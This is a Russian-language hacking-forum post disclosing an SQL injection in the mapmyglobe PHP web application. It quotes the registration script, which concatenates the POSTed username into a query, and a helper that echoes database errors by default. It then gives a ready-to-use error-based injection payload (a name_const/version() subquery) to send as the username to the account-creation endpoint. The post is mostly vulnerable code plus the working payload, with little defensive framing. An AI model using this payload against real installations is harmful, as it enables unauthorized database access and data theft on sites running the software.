15.03.2011, 23:41
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
mapmyglobe
http://sourceforge.net/projects/mapmyglobe/
BSQLi
/user/caccnut.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password1'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password2'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];
require_once[/COLOR][COLOR="#DD0000"]'../lib/dbconfig.php'[/COLOR][COLOR="#007700"];
require_once[/COLOR][COLOR="#DD0000"]'../lib/liblogin.php'[/COLOR][COLOR="#007700"];
require_once[/COLOR][COLOR="#DD0000"]'../lib/config.php'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]"Different passwords. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
if ([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))){
echo[/COLOR][COLOR="#DD0000"]"Username must start with a letter. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
if ([/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"^[a-zA-Z0-9_]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-\.]+$]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]"Wrong email format. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'select * from user where name="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]"Username already exists. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
[/COLOR][/COLOR]
/lib/dbconfig.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'prod'[/COLOR][COLOR="#007700"]]){
die([/COLOR][COLOR="#DD0000"]"Invalid query"[/COLOR][COLOR="#007700"]);
}
else{
die([/COLOR][COLOR="#DD0000"]"Invalid query --[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#DD0000"]-- "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
}
}
return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
$conf['prod'] по умолчанию не установлен, поэтому имеем вывод в ошибке.
Эксплуатация:
Код:
Code:
http://localhost/mapmyglobe-0.1/user/caccnt.php
POST:
username="and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and"
|
|
|